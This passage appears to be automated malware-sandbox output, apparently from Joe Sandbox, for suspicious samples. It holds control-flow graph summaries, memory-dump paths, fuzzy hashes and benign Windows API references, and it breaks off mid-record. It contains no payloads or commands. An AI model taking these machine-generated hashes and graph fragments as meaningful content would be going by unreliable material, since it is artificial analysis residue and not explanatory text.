                                • Opcode ID: a6e6adecae4fe0690951728f315f18476b35a3c532ad997898b23a2a2a1a124e
                                • Instruction ID: 2f82cfe770747bc2c4cec9e62520bd8c57c92568a4d2111c4228053dba4074aa
                                • Opcode Fuzzy Hash: a6e6adecae4fe0690951728f315f18476b35a3c532ad997898b23a2a2a1a124e
                                • Instruction Fuzzy Hash: 9E715770A11B068FE724EF29D04476ABBF1FF88300F10892ED14AD7A90DB79E845CB90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 101 1285a84-1285a8f 103 1285b09-1285b2b 101->103
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4962eeb43484f5f5fa5af5f8544be4ba0c07f0be9278aa56d95805ff1f4187f9
                                • Instruction ID: 3becfec6143ef136f8938181294142c6b67d637505beb9d2e56d6d2ace72f83b
                                • Opcode Fuzzy Hash: 4962eeb43484f5f5fa5af5f8544be4ba0c07f0be9278aa56d95805ff1f4187f9
                                • Instruction Fuzzy Hash: E841227181674ACFDF12DFA8C8843EDFBB1AF52320F144289C055AB291C7759946CB51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 105 12844b4-12859d9 CreateActCtxA 109 12859db-12859e1 105->109 110 12859e2-1285a3c 105->110 109->110 117 1285a4b-1285a4f 110->117 118 1285a3e-1285a41 110->118 119 1285a60 117->119 120 1285a51-1285a5d 117->120 118->117 122 1285a61 119->122 120->119 122->122
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 012859C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 090a1d5ef57ccfb48ae31f28e179c98c4f0697c3f45a63422671f5cb74a9ee84
                                • Instruction ID: d0e7d3bc05fa90a7251af6175cde24c2f89a6be825513dec526007fe2d6a9030
                                • Opcode Fuzzy Hash: 090a1d5ef57ccfb48ae31f28e179c98c4f0697c3f45a63422671f5cb74a9ee84
                                • Instruction Fuzzy Hash: D841BFB0C11719CBEB24DFAAC884BDEFBB5BF49704F20806AD409AB251DB756945CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 123 128590c-128598c 124 128598f-12859d9 CreateActCtxA 123->124 126 12859db-12859e1 124->126 127 12859e2-1285a3c 124->127 126->127 134 1285a4b-1285a4f 127->134 135 1285a3e-1285a41 127->135 136 1285a60 134->136 137 1285a51-1285a5d 134->137 135->134 139 1285a61 136->139 137->136 139->139
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 012859C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 2f1a8fb4d713f663e28ec9a6d8694e3a7527fe09ac83ac938b0c359c7e01053f
                                • Instruction ID: 30f2c858934eec2cede4c0896c498b35f73cf0c6f01307358ec9988414bbb037
                                • Opcode Fuzzy Hash: 2f1a8fb4d713f663e28ec9a6d8694e3a7527fe09ac83ac938b0c359c7e01053f
                                • Instruction Fuzzy Hash: 5E41F0B0C00719CBEB24DFA9C884BDEFBB5BF49304F20806AD409AB291DB755945CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 140 128d6b9-128d754 DuplicateHandle 141 128d75d-128d77a 140->141 142 128d756-128d75c 140->142 142->141
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128D747
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: d81aab872aa16c20e1dd315f6abda2bcc59970ba6a368ca5cdcf892ea6334bdc
                                • Instruction ID: a5ad217071a2b633cbe0c1ecf76fb12627ae3eae65ddfe5d0070451233d461d0
                                • Opcode Fuzzy Hash: d81aab872aa16c20e1dd315f6abda2bcc59970ba6a368ca5cdcf892ea6334bdc
                                • Instruction Fuzzy Hash: 2721E4B59012499FDB10CF9AD484AEEBFF5FB48310F14802AE914B3350C374A954CF61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 145 128d6c0-128d754 DuplicateHandle 146 128d75d-128d77a 145->146 147 128d756-128d75c 145->147 147->146
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128D747
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 8d4ff9c6ee98f06a8258cf0f409b2e9960fa05c3a58e9c1eda0aa398ad49c99c
                                • Instruction ID: ec6a421734c90a90f9e05d83b1ae952db341cb0d3e7c5decf76a2738f1e486cd
                                • Opcode Fuzzy Hash: 8d4ff9c6ee98f06a8258cf0f409b2e9960fa05c3a58e9c1eda0aa398ad49c99c
                                • Instruction Fuzzy Hash: DB21E4B59002499FDB10DF9AD484ADEBBF5FB48310F14802AE914A3350D374A954CF61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 150 128afd8-128b018 151 128b01a-128b01d 150->151 152 128b020-128b04b GetModuleHandleW 150->152 151->152 153 128b04d-128b053 152->153 154 128b054-128b068 152->154 153->154
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0128B03E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 1a594241723c54cb43efaf23c293ae0302fc17eb90c5665ca05035c6eb7c4831
                                • Instruction ID: e63b6ce19316612db3d16db5148a99011652a86c0dd6345675abb24119887db1
                                • Opcode Fuzzy Hash: 1a594241723c54cb43efaf23c293ae0302fc17eb90c5665ca05035c6eb7c4831
                                • Instruction Fuzzy Hash: 461110B5C003498FDB20DF9AC444BDEFBF4AB88324F20842AD529B7650D379A545CFA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443754773.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_122d000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e8249d7ce81abb93185b17c7d4e7943fde0c0253bcaf5a2a05430b2681b9c94
                                • Instruction ID: b90c6e9108ae8e8401d5dc29721e66872834f4b3485d1e7f324c3501289d0134
                                • Opcode Fuzzy Hash: 8e8249d7ce81abb93185b17c7d4e7943fde0c0253bcaf5a2a05430b2681b9c94
                                • Instruction Fuzzy Hash: 73214571510248EFDB11DF54E8C0B2ABF65FB88318F24C569E9090B256C3B6D466CBA2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443797883.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_123d000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1d66ef2bf22ee8aa2ad85e58c9473e8ac0a016ab2a84053592867c9bf7678bf
                                • Instruction ID: 79420f7779e2a09527c4a4a574f872d46d1395ff90b7e9a9d47460154022312c
                                • Opcode Fuzzy Hash: e1d66ef2bf22ee8aa2ad85e58c9473e8ac0a016ab2a84053592867c9bf7678bf
                                • Instruction Fuzzy Hash: 352137B1524308DFDB01DF94C5C0B25BB65FBC4324F64C56DE9094B283C776D806CA61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443797883.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_123d000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
                                • Instruction ID: 4e92772379af90e0e9667d59318ca89136832ef9441eb043998ab2662271e339
                                • Opcode Fuzzy Hash: 83b53722707b5f74c9b6ac445e7c400e1de96258d55ad2023ae6e17421a45247
                                • Instruction Fuzzy Hash: 352100B1614348DFDB15DFA4D8C0B26FB65FB84B14F64C569E90A4B282C376D807CA62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443797883.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_123d000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                • Instruction ID: c99c9645875b7e587dea289eab0f043165327bc5ce5f439fc3a798e25b921594
                                • Opcode Fuzzy Hash: 1da43bd095657f2ef3259ca27cbd77ed819846956518aae676a5088dee402215
                                • Instruction Fuzzy Hash: D321B3B14083849FCB02CF64D994711BF71EB86314F28C5DAD9498F2A7C33A9806CB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443754773.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_122d000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                • Instruction ID: 021389cccff17b09fe5c82ba03db643f7770754f46f0ff4957d84c4cddfc26ef
                                • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                • Instruction Fuzzy Hash: F6110376404284DFCB12CF54D5C0B5ABF71FB84318F24C6A9D9090B657C33AD46ACBA1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1475175249.000000000A7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A7D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a7d0000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3d4d33bf9d9246ffcfb8a9ef64fe4fe97c379c2a53c8dccf768efd6f32b701dc
                                • Instruction ID: 184b0fdfeaf58e7f886e787a12d9c17d06213c943dd2829979a1a4b37919cb5f
                                • Opcode Fuzzy Hash: 3d4d33bf9d9246ffcfb8a9ef64fe4fe97c379c2a53c8dccf768efd6f32b701dc
                                • Instruction Fuzzy Hash: C21177313196808FD326CB79D864A657FB2AFCA515B19C4ADD149CB772C624DC0ACB11
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443797883.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_123d000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction ID: 652fb42ef3662e997fe01e63a0c6d3bd74b83d8597667452a5b80241330c423e
                                • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                • Instruction Fuzzy Hash: B611BBB5504284DFDB02CF54C5C0B15BBA1FB84224F28C6AAD9494B697C33AD44ACB61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1475175249.000000000A7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A7D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a7d0000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e13bc5df2071c4700b4783dacef0fe6ebe06f3295773c993f74f1cf43c3db813
                                • Instruction ID: cafd31893e9410f794c9cbdbd4e60e1d0908fb6e7939b4bfdfe0e28703517aad
                                • Opcode Fuzzy Hash: e13bc5df2071c4700b4783dacef0fe6ebe06f3295773c993f74f1cf43c3db813
                                • Instruction Fuzzy Hash: 36012131310A048FC728DB6AD858A2ABBE6FFC9625B15C47CD21ACB765DA34DC05CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1475175249.000000000A7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A7D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a7d0000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 920d346ec893a54ed60206a1e1dbb05ee1a1266cf0089c38df526cf74bc8a53b
                                • Instruction ID: 7cd729189d65ca7791363c4eefa55229cdd426a221fccc81d38caabd21731c0e
                                • Opcode Fuzzy Hash: 920d346ec893a54ed60206a1e1dbb05ee1a1266cf0089c38df526cf74bc8a53b
                                • Instruction Fuzzy Hash: 68D1CC707013048FDB29EB75C454BAEBBF6AF89200F54856ED146DB2A1CF35E90ACB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a84625b7be44253098555abf28ee0d33ea50357096f15091c18c97c39c3dd685
                                • Instruction ID: ff9bd3c88940344bc76a7c141a9548c7c38007189d18d05884f4a355129031e5
                                • Opcode Fuzzy Hash: a84625b7be44253098555abf28ee0d33ea50357096f15091c18c97c39c3dd685
                                • Instruction Fuzzy Hash: F1A1A532E2121ACFCF15EFB4C5445AEBBB2FF84304B15456AE901AB2A5EB31D916CB40

                                Execution Graph

                                Execution Coverage:7.7%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:71
                                Total number of Limit Nodes:8
                                execution_graph 15805 ca4668 15806 ca467a 15805->15806 15807 ca4686 15806->15807 15811 ca4778 15806->15811 15816 ca3e34 15807->15816 15809 ca46a5 15812 ca479d 15811->15812 15820 ca4888 15812->15820 15824 ca4878 15812->15824 15817 ca3e3f 15816->15817 15832 ca5c7c 15817->15832 15819 ca6ff1 15819->15809 15822 ca48af 15820->15822 15821 ca498c 15821->15821 15822->15821 15828 ca44b4 15822->15828 15826 ca48af 15824->15826 15825 ca498c 15825->15825 15826->15825 15827 ca44b4 CreateActCtxA 15826->15827 15827->15825 15829 ca5918 CreateActCtxA 15828->15829 15831 ca59db 15829->15831 15833 ca5c87 15832->15833 15836 ca5c9c 15833->15836 15835 ca712d 15835->15819 15837 ca5ca7 15836->15837 15840 ca5ccc 15837->15840 15839 ca7202 15839->15835 15841 ca5cd7 15840->15841 15844 ca5cfc 15841->15844 15843 ca7305 15843->15839 15845 ca5d07 15844->15845 15846 ca860b 15845->15846 15848 caacb9 15845->15848 15846->15843 15849 caacc8 15848->15849 15853 caacdf 15849->15853 15858 caacf0 15849->15858 15850 caacce 15850->15846 15854 caacf0 15853->15854 15862 caadd8 15854->15862 15867 caade8 15854->15867 15855 caacff 15855->15850 15860 caadd8 GetModuleHandleW 15858->15860 15861 caade8 GetModuleHandleW 15858->15861 15859 caacff 15859->15850 15860->15859 15861->15859 15863 caadf9 15862->15863 15864 caae1c 15862->15864 15863->15864 15865 cab020 GetModuleHandleW 15863->15865 15864->15855 15866 cab04d 15865->15866 15866->15855 15868 caae1c 15867->15868 15869 caadf9 15867->15869 15868->15855 15869->15868 15870 cab020 GetModuleHandleW 15869->15870 15871 cab04d 15870->15871 15871->15855 15872 cad478 15873 cad4be GetCurrentProcess 15872->15873 15875 cad510 GetCurrentThread 15873->15875 15878 cad509 15873->15878 15876 cad54d GetCurrentProcess 15875->15876 15879 cad546 15875->15879 15877 cad583 GetCurrentThreadId 15876->15877 15881 cad5dc 15877->15881 15878->15875 15879->15876 15882 cad6c0 DuplicateHandle 15883 cad756 15882->15883 15884 cacf60 15885 cacf6d 15884->15885 15887 cacfa7 15885->15887 15888 cab7c0 15885->15888 15890 cab7cb 15888->15890 15889 cadcb8 15890->15889 15892 cad0c4 15890->15892 15893 cad0cf 15892->15893 15894 ca5cfc 2 API calls 15893->15894 15895 cadd27 15894->15895 15895->15889

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 00CAD4F6
                                • GetCurrentThread.KERNEL32 ref: 00CAD533
                                • GetCurrentProcess.KERNEL32 ref: 00CAD570
                                • GetCurrentThreadId.KERNEL32 ref: 00CAD5C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 6369fd811d24a3d23ed26101b978d18da82022ee7754bed6eda52c50795aaa1d
                                • Instruction ID: 0f985f61660fecad61139fdd1a47dacd1f93c3c515294fff65bc1dc181ec225f
                                • Opcode Fuzzy Hash: 6369fd811d24a3d23ed26101b978d18da82022ee7754bed6eda52c50795aaa1d
                                • Instruction Fuzzy Hash: AE5156B0D012098FDB54CFAAD548B9EBBF1AF49308F208459E01AA7390D7749984CF65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 32 caade8-caadf7 33 caadf9-caae06 call ca9414 32->33 34 caae23-caae27 32->34 39 caae08 33->39 40 caae1c 33->40 36 caae3b-caae7c 34->36 37 caae29-caae33 34->37 43 caae89-caae97 36->43 44 caae7e-caae86 36->44 37->36 87 caae0e call cab080 39->87 88 caae0e call cab070 39->88 40->34 45 caaebb-caaebd 43->45 46 caae99-caae9e 43->46 44->43 51 caaec0-caaec7 45->51 48 caaea9 46->48 49 caaea0-caaea7 call caa150 46->49 47 caae14-caae16 47->40 50 caaf58-cab018 47->50 53 caaeab-caaeb9 48->53 49->53 82 cab01a-cab01d 50->82 83 cab020-cab04b GetModuleHandleW 50->83 54 caaec9-caaed1 51->54 55 caaed4-caaedb 51->55 53->51 54->55 57 caaee8-caaef1 call caa160 55->57 58 caaedd-caaee5 55->58 63 caaefe-caaf03 57->63 64 caaef3-caaefb 57->64 58->57 65 caaf21-caaf2e 63->65 66 caaf05-caaf0c 63->66 64->63 73 caaf30-caaf4e 65->73 74 caaf51-caaf57 65->74 66->65 68 caaf0e-caaf1e call caa170 call caa180 66->68 68->65 73->74 82->83 84 cab04d-cab053 83->84 85 cab054-cab068 83->85 84->85 87->47 88->47
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CAB03E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 6262ebbd8b81d9cc8d3a2af632ac5fb89aa04e9b010425ed01f88e4e9ab73cc7
                                • Instruction ID: 8ce09d1737f3ee2b80cc9021aaebbb9ea1fd0e2e5c7e8da3862174b40ab17c65
                                • Opcode Fuzzy Hash: 6262ebbd8b81d9cc8d3a2af632ac5fb89aa04e9b010425ed01f88e4e9ab73cc7
                                • Instruction Fuzzy Hash: A2716470A00B068FDB24DF6AD44179ABBF1FF89304F00892DE09AD7A40E775E959CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 89 ca44b4-ca59d9 CreateActCtxA 92 ca59db-ca59e1 89->92 93 ca59e2-ca5a3c 89->93 92->93 100 ca5a4b-ca5a4f 93->100 101 ca5a3e-ca5a41 93->101 102 ca5a60 100->102 103 ca5a51-ca5a5d 100->103 101->100 105 ca5a61 102->105 103->102 105->105
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 00CA59C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 80dc212190041384c452a123d62b9003e647acc23f10204b979172195d14f035
                                • Instruction ID: 6fd8ba76270745f7a45b1f427d21021c14844446a6f3a243692cf67ed27437e3
                                • Opcode Fuzzy Hash: 80dc212190041384c452a123d62b9003e647acc23f10204b979172195d14f035
                                • Instruction Fuzzy Hash: 4341E170D00719CBEB24CFAAC844BDEBBB5BF49304F20806AD418AB251DB755945CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 106 ca590c-ca5913 107 ca591c-ca59d9 CreateActCtxA 106->107 109 ca59db-ca59e1 107->109 110 ca59e2-ca5a3c 107->110 109->110 117 ca5a4b-ca5a4f 110->117 118 ca5a3e-ca5a41 110->118 119 ca5a60 117->119 120 ca5a51-ca5a5d 117->120 118->117 122 ca5a61 119->122 120->119 122->122
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 00CA59C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: c8c26a37a8f0186defad34e358ac1002a05172f390565ac66a6aa348dc6b93fd
                                • Instruction ID: 9e19a12046450fd44dd63d17662b712cb65af0e0784752c3effa69a4ceb9144e
                                • Opcode Fuzzy Hash: c8c26a37a8f0186defad34e358ac1002a05172f390565ac66a6aa348dc6b93fd
                                • Instruction Fuzzy Hash: 9A41EEB1D00719CFEB24CFAAC8847DEBBB5BF49304F20806AD418AB251DB756946CF50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 123 cad6c0-cad754 DuplicateHandle 124 cad75d-cad77a 123->124 125 cad756-cad75c 123->125 125->124
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD747
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 59c5f17257f1d5e2da9fa027ddadf9c5b620528b9d22498a21f8845a2d415aa2
                                • Instruction ID: bd6c3b74f849a62fbc74fcfea233bca15bc47d58a573a0f282f9f1a0d8f05dbe
                                • Opcode Fuzzy Hash: 59c5f17257f1d5e2da9fa027ddadf9c5b620528b9d22498a21f8845a2d415aa2
                                • Instruction Fuzzy Hash: D621F3B5900209DFDB10CFAAD984ADEFBF8FB48310F14801AE919A3350D378A940CFA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 128 caafd8-cab018 129 cab01a-cab01d 128->129 130 cab020-cab04b GetModuleHandleW 128->130 129->130 131 cab04d-cab053 130->131 132 cab054-cab068 130->132 131->132
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CAB03E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1572078533.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_ca0000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 85e3b0109935629e33c83a83ffbdf08d61e5f5e72463ee759fddce7a63c5f64d
                                • Instruction ID: 4bf21a6be9c42b880f7b735f6d7256b70a72c27906603f2058c1617660138d90
                                • Opcode Fuzzy Hash: 85e3b0109935629e33c83a83ffbdf08d61e5f5e72463ee759fddce7a63c5f64d
                                • Instruction Fuzzy Hash: 82110FB5C006498FDB10CF9AC444BDEFBF4AB89314F10842AD528A7700D379A945CFA1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1570503323.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_a0d000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2087e89f0bf0798cd09cf27e0c127445778ee8497cb75d619d46262ec0b90ee7
                                • Instruction ID: afa8b581c452fd9a5ee8d4ddb2206b7b66b9aed06b105e3478f92741dc591644
                                • Opcode Fuzzy Hash: 2087e89f0bf0798cd09cf27e0c127445778ee8497cb75d619d46262ec0b90ee7
                                • Instruction Fuzzy Hash: 18213A72500348DFDB04DF50E9C0B26BB65FB94324F24C569E9090F296C337E856CBA2
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1570584230.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_a1d000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 689f1719fe13f6fdea3ec04d692d30388bc07a5dab841ebca62bee1b5d930ffd
                                • Instruction ID: 5b3ff9800fca4c67e7346b19fc8b33de16559b1f9e2f9836b35d798cb74a4055
                                • Opcode Fuzzy Hash: 689f1719fe13f6fdea3ec04d692d30388bc07a5dab841ebca62bee1b5d930ffd
                                • Instruction Fuzzy Hash: 04210471504344EFDB05DF10D9C0BA6BBA5FB84314F34C6ADE8094B292C336D886CA61
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1570584230.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_a1d000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4616d6fd56ba4992532b21c986e2c9c293b9820d7edfa0aa64c4754dd62b1d0
                                • Instruction ID: 8a975657e1041a4e0798e6eea3b60a8ca53448514f6da490f4da6436278a80c6
                                • Opcode Fuzzy Hash: a4616d6fd56ba4992532b21c986e2c9c293b9820d7edfa0aa64c4754dd62b1d0
                                • Instruction Fuzzy Hash: 0621F275604344EFDB14DF14D9C0B66BB65FB88314F24C5ADD80A4B286C33AD887CA62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1570584230.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_a1d000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e67edbf421b7f4e2b5165f17717861e21a283d04440669561dfdf0dc3e6dba67
                                • Instruction ID: 17effce3fedd7d5b923703770c92e3f6c9e6bcbb91c53373f72790ce3f706886
                                • Opcode Fuzzy Hash: e67edbf421b7f4e2b5165f17717861e21a283d04440669561dfdf0dc3e6dba67
                                • Instruction Fuzzy Hash: 57219F755093808FCB02CF24D990B55BF71EB49314F28C5DAD8498B6A7C33A984ACB62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1570503323.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_a0d000_iWEWjTXiqXke.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                • Instruction ID: 225b7eebf879ab7a9b8a59d22cecd22a905388ec772cc2eb2cf9a4d8a0eb7fb0
